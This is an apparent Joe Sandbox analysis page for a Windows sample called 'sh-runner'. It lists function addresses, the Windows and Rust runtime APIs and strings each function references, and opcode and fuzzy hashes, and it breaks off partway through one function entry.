Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd

Similarity

API ID: ErrorLast$getpeernamesetsockopt
String ID: assertion failed: len >= mem::size_of::<c::sockaddr_in6>()$assertion failed: len >= mem::size_of::<c::sockaddr_in>()std\src\sys_common\net.rs
API String ID: 2225440259-3544120690
Opcode ID: 4e6500ef247e5211302496dac379e2d7bb86f636a011938257614adb463dc771
Instruction ID: ecab5cb7d90d236a44736e028bb14b4119088c444077b57e41d427d3bc1a4229
Opcode Fuzzy Hash: 4e6500ef247e5211302496dac379e2d7bb86f636a011938257614adb463dc771
Instruction Fuzzy Hash: 8841D921D185918AF329AF68E8412FCB370EF44318F949135EE9D427A1EF3C96C5C751

Function 00007FF72BCF5CF0 Relevance: 9.2, APIs: 6, Instructions: 184COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF72BCF5D73
RtlCaptureContext.KERNEL32 ref: 00007FF72BCF5D7B
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF72BCF5D9F
RtlVirtualUnwind.KERNEL32 ref: 00007FF72BCF5F26
WakeByAddressSingle.API-MS-WIN-CORE-SYNCH-L1-2-0 ref: 00007FF72BCF600E

Memory Dump Source

Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true

Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd

Similarity

API ID: AddressCaptureContextEntryFunctionLookupSingleUnwindVirtualWakememset
String ID:
API String ID: 2014759167-0
Opcode ID: 8fecb2d7b38c102e24f7d548581241a1708a972fe1595f8de14360d101d8d413
Instruction ID: 24c99fea1bc7a46c6a0fa2b26bd46260f41a159fb65ab4354fcc2dee857d3605
Opcode Fuzzy Hash: 8fecb2d7b38c102e24f7d548581241a1708a972fe1595f8de14360d101d8d413
Instruction Fuzzy Hash: 1E916E62605BC189EB74AF28DC403E967A0FB44798F84413ADF4C5BBA9DF38A584C754

Function 00007FF72BD129B0 Relevance: 9.2, APIs: 6, Instructions: 178COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32 ref: 00007FF72BD12AA9
GetFinalPathNameByHandleW.KERNEL32 ref: 00007FF72BD12ABE
GetLastError.KERNEL32 ref: 00007FF72BD12AC9
GetLastError.KERNEL32 ref: 00007FF72BD12AE2
GetLastError.KERNEL32 ref: 00007FF72BD12B7E
CloseHandle.KERNEL32 ref: 00007FF72BD12C92

Memory Dump Source

Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true

Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd

Similarity

API ID: ErrorLast$Handle$CloseFinalNamePath
String ID:
API String ID: 3328380333-0
Opcode ID: cce2e92626dcaf6cbdcd668c325d07161b7a85dd1c0f94e95153eae62401de72
Instruction ID: 697be838cfaf792608a060a575404211bb26f073d4b59cb13520215fc15b9e66
Opcode Fuzzy Hash: cce2e92626dcaf6cbdcd668c325d07161b7a85dd1c0f94e95153eae62401de72
Instruction Fuzzy Hash: 3D71E522A18BC145EB39AF79ED443F9A254EB44BD8F809135DE8C577A9DF3D92808B10

Function 00007FF72BD16BF0 Relevance: 9.2, APIs: 6, Instructions: 162COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 00007FF72BD16C2D
GetOverlappedResult.KERNEL32 ref: 00007FF72BD16CFD

Memory Dump Source

Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true

Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd

Similarity

API ID: CloseHandleOverlappedResult
String ID:
API String ID: 1555921936-0
Opcode ID: dfbb019512cb01cfff0d376b161d343788e31632958b41f29bd11ca82096159d
Instruction ID: a543891456067824ed3397dd6813c86b22c5854d37f50a47634e64ba8e53b4e0
Opcode Fuzzy Hash: dfbb019512cb01cfff0d376b161d343788e31632958b41f29bd11ca82096159d
Instruction Fuzzy Hash: E161D726F1864188FB14EB79C8413FC6BA0EB94788F946535DE0D52BA9DF38D18587A0

Function 00007FF72BD231F0 Relevance: 9.2, APIs: 6, Instructions: 151fileCOMMON

Download Yara Rule

APIs

CreateFileMappingA.KERNEL32 ref: 00007FF72BD23396
MapViewOfFile.KERNEL32 ref: 00007FF72BD233B6
CloseHandle.KERNEL32 ref: 00007FF72BD233C1
CloseHandle.KERNEL32 ref: 00007FF72BD233EA
CloseHandle.KERNEL32 ref: 00007FF72BD23400

Memory Dump Source

Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true

Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd

Similarity

API ID: CloseHandle$File$CreateMappingView
String ID:
API String ID: 1771758222-0
Opcode ID: 4b946a78d64c3cee64e25fe7fa159cd530b1d760f7afde8bcb70e86244d2371d
Instruction ID: 772b0b5ce2651370756ec4d64c8cebd14c539547c8fb9d022aea17b1119114ce
Opcode Fuzzy Hash: 4b946a78d64c3cee64e25fe7fa159cd530b1d760f7afde8bcb70e86244d2371d
Instruction Fuzzy Hash: F351C432B08B4286FB18EB59E8447EDA6A0FF49B94F948039DE5C07796DF3DD5828710

Function 00007FF72BD1BC01 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 143COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 00007FF72BD1BCA4
CloseHandle.KERNEL32 ref: 00007FF72BD1BCEB
CloseHandle.KERNEL32 ref: 00007FF72BD1BD52
CloseHandle.KERNEL32 ref: 00007FF72BD1BD67
CloseHandle.KERNEL32 ref: 00007FF72BD1C224

Strings

program path has no file name, xrefs: 00007FF72BD1C290

Memory Dump Source

Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true

Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd

Similarity

API ID: CloseHandle
String ID: program path has no file name
API String ID: 2962429428-697003637
Opcode ID: b645622684179f8fa3b2ecf66bb67c7c8431540330c75a7dd647d430661c3de5
Instruction ID: 95956c95bf51f0ab718b01f47aca4bf33a4375c68570954c7467475f4e125175
Opcode Fuzzy Hash: b645622684179f8fa3b2ecf66bb67c7c8431540330c75a7dd647d430661c3de5
Instruction Fuzzy Hash: A3518765A1854285EB68BB7DDC403FD9350EF85B88FC41436DE0D4B7A6CE3DE5819B20

Function 00007FF72BCF9210 Relevance: 9.1, APIs: 6, Instructions: 131COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 00007FF72BCF9279

Memory Dump Source

Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true

Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 6063ef6a35550308bd84fe7ea6daae55b4702e1d0406f7726d112292e084be9a
Instruction ID: 1cf557daafffaf4d303bd2b69f492d21f7aa863190307c2d7d816e2b862ffa52
Opcode Fuzzy Hash: 6063ef6a35550308bd84fe7ea6daae55b4702e1d0406f7726d112292e084be9a
Instruction Fuzzy Hash: A041F351F0868241FE0CB76E99143F99651EF89BC8F888435DE0C07BA6DE6CE5C68B20

Function 00007FF72BD14550 Relevance: 9.1, APIs: 6, Instructions: 68networkCOMMON

Download Yara Rule

APIs

WSAGetLastError.WS2_32 ref: 00007FF72BD145A0
WSASocketW.WS2_32 ref: 00007FF72BD145D0
SetHandleInformation.KERNEL32 ref: 00007FF72BD145EB
GetLastError.KERNEL32 ref: 00007FF72BD145F4
closesocket.WS2_32 ref: 00007FF72BD14606
WSAGetLastError.WS2_32 ref: 00007FF72BD14615

Memory Dump Source

Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true

Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd

Similarity

API ID: ErrorLast$HandleInformationSocketclosesocket
String ID:
API String ID: 1159780279-0
Opcode ID: b938f4549eabdc51a0458d546100953ac200c90f34d34bb03aece01258d68e6c
Instruction ID: 99e6b14e2cce8a996a89e9ef45bf94dd54cff2acccbdf75b51e801db8e23feb3
Opcode Fuzzy Hash: b938f4549eabdc51a0458d546100953ac200c90f34d34bb03aece01258d68e6c
Instruction Fuzzy Hash: AE11E721F184A146F738657D6805BE59580EBC83F8F981334EE7C477E6DD7DA8864E10

Function 00007FF72BD3574B Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 52COMMON

Download Yara Rule

APIs

memcmp.MSVCRT ref: 00007FF72BD357BF

Strings

R8_F, xrefs: 00007FF72BD35780
R8_U, xrefs: 00007FF72BD3574B
R9_F, xrefs: 00007FF72BD35799
R9_U, xrefs: 00007FF72BD35767
TPIDPRHTPIDPRSPLRPCACC0ACC1ACC2ACC3ACC4ACC5ACC6ACC7S0S1S2S3S4S5S6S7S8S9S10S11S12S13S14S15S16S17S18S19S20S21S22S23S24S25S26S27S28S29S30S31X0X1X2X3X4X5X6X7X8X9X10X11X12X13X14X15X16X17X18X19X20X21X22X23X24X25X26X27X28X29X30ELR_modeRA_SIGN_STATETPIDRRO_EL0TPIDR_EL, xrefs: 00007FF72BD357B2

Memory Dump Source

Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true

Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd

Similarity

API ID: memcmp
String ID: R8_F$R8_U$R9_F$R9_U$TPIDPRHTPIDPRSPLRPCACC0ACC1ACC2ACC3ACC4ACC5ACC6ACC7S0S1S2S3S4S5S6S7S8S9S10S11S12S13S14S15S16S17S18S19S20S21S22S23S24S25S26S27S28S29S30S31X0X1X2X3X4X5X6X7X8X9X10X11X12X13X14X15X16X17X18X19X20X21X22X23X24X25X26X27X28X29X30ELR_modeRA_SIGN_STATETPIDRRO_EL0TPIDR_EL
API String ID: 1475443563-1802361725
Opcode ID: f551b046c624ded6a021d9b272614563cc3dd94d28dc6351541a9b3b15702328
Instruction ID: 3a92941c7433b1227fd0935746fd409b0412de31de987ca95dc521887453fe9c
Opcode Fuzzy Hash: f551b046c624ded6a021d9b272614563cc3dd94d28dc6351541a9b3b15702328
Instruction Fuzzy Hash: 1D110432A0804286F77CAE3C98511FEA5E0DB18755F84443ADB9F8A2D2DD7CF4899F64

Function 00007FF72BCF4D60 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 174COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF72BD28780: TlsGetValue.KERNEL32 ref: 00007FF72BD287A2
Part of subcall function 00007FF72BD28780: TlsGetValue.KERNEL32 ref: 00007FF72BD28803
Part of subcall function 00007FF72BD28780: TlsSetValue.KERNEL32 ref: 00007FF72BD28813

WaitOnAddress.API-MS-WIN-CORE-SYNCH-L1-2-0 ref: 00007FF72BCF4E5E
GetLastError.KERNEL32 ref: 00007FF72BCF4E68
WaitOnAddress.API-MS-WIN-CORE-SYNCH-L1-2-0 ref: 00007FF72BCF4F81
GetLastError.KERNEL32 ref: 00007FF72BCF4F8B

Strings

use of std::thread::current() is not possible after the thread's local data has been destroyedstd\src\thread\mod.rs, xrefs: 00007FF72BCF4E6F, 00007FF72BCF4FB1

Memory Dump Source

Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true

Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd

Similarity

API ID: Value$AddressErrorLastWait
String ID: use of std::thread::current() is not possible after the thread's local data has been destroyedstd\src\thread\mod.rs
API String ID: 1881407604-459553403
Opcode ID: fbf02877470affe050ffdbb8edb95464c21b913d93ddea9765e51dac9e51792e
Instruction ID: 3e35c2db9fce0ba9d42cca2846c74012bb8235880a4a407580fcd01f8f8a841c
Opcode Fuzzy Hash: fbf02877470affe050ffdbb8edb95464c21b913d93ddea9765e51dac9e51792e
Instruction Fuzzy Hash: C251E222F0894299FB19BB6C9C112FDA665EB40754FC88176DE0D57BE5DE3CB1828B20

Function 00007FF72BD22B40 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 148networkCOMMON

Download Yara Rule

APIs

WSAGetLastError.WS2_32 ref: 00007FF72BD22BC9

Strings

assertion failed: len >= mem::size_of::<c::sockaddr_in>()std\src\sys_common\net.rs, xrefs: 00007FF72BD22C30
TcpListenerUdpSocket.debug_abbrev.dwo.debug_info.dwo.debug_line.dwo.debug_loc.dwo.debug_loclists.dwo.debug_rnglists.dwo.debug_str.dwo.debug_str_offsets.dwo.debug_types.dwostd\src\..\..\backtrace\src\symbolize\gimli.rs, xrefs: 00007FF72BD22C88
assertion failed: len >= mem::size_of::<c::sockaddr_in6>(), xrefs: 00007FF72BD22C48
addr, xrefs: 00007FF72BD22D21

Memory Dump Source

Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true

Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd

Similarity

API ID: ErrorLast
String ID: TcpListenerUdpSocket.debug_abbrev.dwo.debug_info.dwo.debug_line.dwo.debug_loc.dwo.debug_loclists.dwo.debug_rnglists.dwo.debug_str.dwo.debug_str_offsets.dwo.debug_types.dwostd\src\..\..\backtrace\src\symbolize\gimli.rs$addr$assertion failed: len >= mem::size_of::<c::sockaddr_in6>()$assertion failed: len >= mem::size_of::<c::sockaddr_in>()std\src\sys_common\net.rs
API String ID: 1452528299-1398425720
Opcode ID: c9fb1dc49f0c6a3f39c471d5885720b195e0b6d05b32bbbf8232a37ce6ef8813
Instruction ID: 7bf2ffdc2b167850e5ba0bd8526918a8b0356b7f17b095444d7354732a8a5e7f
Opcode Fuzzy Hash: c9fb1dc49f0c6a3f39c471d5885720b195e0b6d05b32bbbf8232a37ce6ef8813
Instruction Fuzzy Hash: F6619126A1869285F729AF58E8413FCA370EF44758F848136EE8D13766EF3CA685C750

Function 00007FF72BD0C4D0 Relevance: 8.0, APIs: 3, Strings: 2, Instructions: 479COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FF72BD0C540
memcpy.MSVCRT ref: 00007FF72BD0C5EF

Strings

assertion failed: self.height > 0, xrefs: 00007FF72BD0CC8F
PATHstd\src\sys_common\process.rs, xrefs: 00007FF72BD0C58D, 00007FF72BD0C78A

Memory Dump Source

Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true

Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd

Similarity

API ID: memcpy
String ID: PATHstd\src\sys_common\process.rs$assertion failed: self.height > 0
API String ID: 3510742995-122754119
Opcode ID: 954c6353572963fa527ae682fe59735aeb8cddd5bd717976e8cd1ae11293ecb5
Instruction ID: 49a2197b6097e2a3afe20ccdee822330b5caf9710058ef63a9fe52293644fbe7
Opcode Fuzzy Hash: 954c6353572963fa527ae682fe59735aeb8cddd5bd717976e8cd1ae11293ecb5
Instruction Fuzzy Hash: D322B622A04BD285E726AF29D8413F9A7A0FF54B98F884531DE4D177A6EF38D2C5C710

Function 00007FF72BD105B0 Relevance: 7.7, APIs: 5, Instructions: 180COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF72BD107DB
GetLastError.KERNEL32 ref: 00007FF72BD107F7

Memory Dump Source

Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true

Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: d2ba8f167fe8e9c4f7cfaa7e353470eb4328f6a9ab1888e480ecfba10196ba5c
Instruction ID: f97c3ad6773df1c6ce337ea842dc0e19564cd47c72b2de761c9b28e8d78b61f3
Opcode Fuzzy Hash: d2ba8f167fe8e9c4f7cfaa7e353470eb4328f6a9ab1888e480ecfba10196ba5c
Instruction Fuzzy Hash: DF61E291E1825246FB69B63999003F99690EB88BD8FC45131DD5D27BE9CE2DD842CF30

Function 00007FF72BD18CA7 Relevance: 7.7, APIs: 5, Instructions: 178COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32 ref: 00007FF72BD18BF0
SetLastError.KERNEL32 ref: 00007FF72BD19FF6
GetSystemDirectoryW.KERNEL32 ref: 00007FF72BD1A001
GetLastError.KERNEL32 ref: 00007FF72BD1A00C
GetLastError.KERNEL32 ref: 00007FF72BD1A020
CloseHandle.KERNEL32 ref: 00007FF72BD1BCA4
CloseHandle.KERNEL32 ref: 00007FF72BD1BCEB
CloseHandle.KERNEL32 ref: 00007FF72BD1BD52
CloseHandle.KERNEL32 ref: 00007FF72BD1BD67

Memory Dump Source

Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true

Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd

Similarity

API ID: CloseHandle$ErrorLast$DirectorySystem
String ID:
API String ID: 768002510-0
Opcode ID: 0a4ca29d2f8a300a0a0d543ad49635f68eddb652e0a2c4f9f13c6ad2c7ec1f2c
Instruction ID: 8db1eedd738ce2ae07ce955858effc09aa1b194d22e790bf86d6c867bf7381b7
Opcode Fuzzy Hash: 0a4ca29d2f8a300a0a0d543ad49635f68eddb652e0a2c4f9f13c6ad2c7ec1f2c
Instruction Fuzzy Hash: 6F81B122A14ED188E774AF39DC443FA63A0FB44799F801135DA1D9BBE9DF399542CB10

Function 00007FF72BCE2940 Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 157COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FF72BCE29CE
memcpy.MSVCRT ref: 00007FF72BCE2A05

Strings

assertion failed: new_left_len <= CAPACITY, xrefs: 00007FF72BCE2907, 00007FF72BCE2D03
assertion failed: match track_edge_idx { LeftOrRight::Left(idx) => idx <= old_left_len, LeftOrRight::Right(idx) => idx <= right_len,}, xrefs: 00007FF72BCE32D3
assertion failed: old_left_len + count <= CAPACITY, xrefs: 00007FF72BCE24F2

Memory Dump Source

Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true

Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd

Similarity

API ID: memcpy
String ID: assertion failed: match track_edge_idx { LeftOrRight::Left(idx) => idx <= old_left_len, LeftOrRight::Right(idx) => idx <= right_len,}$assertion failed: new_left_len <= CAPACITY$assertion failed: old_left_len + count <= CAPACITY
API String ID: 3510742995-3535459961
Opcode ID: 4f9eca0a564fd9a118a8043acdcfae24573531f22f77b14d8c68785833c78f72
Instruction ID: a106fd7f795b123f5812ae7e38f14b1a53f3e13022e3d1217496ebafc85f5808
Opcode Fuzzy Hash: 4f9eca0a564fd9a118a8043acdcfae24573531f22f77b14d8c68785833c78f72
Instruction Fuzzy Hash: 25816E32A04BC585E715DF68DC403E973A4FB58B88F948225DE8C17769EF7992D5D300

Function 00007FF72BD1D650 Relevance: 7.6, APIs: 5, Instructions: 140COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32 ref: 00007FF72BD1D6D5
WriteConsoleW.KERNEL32 ref: 00007FF72BD1D714
WriteConsoleW.KERNEL32 ref: 00007FF72BD1D77B
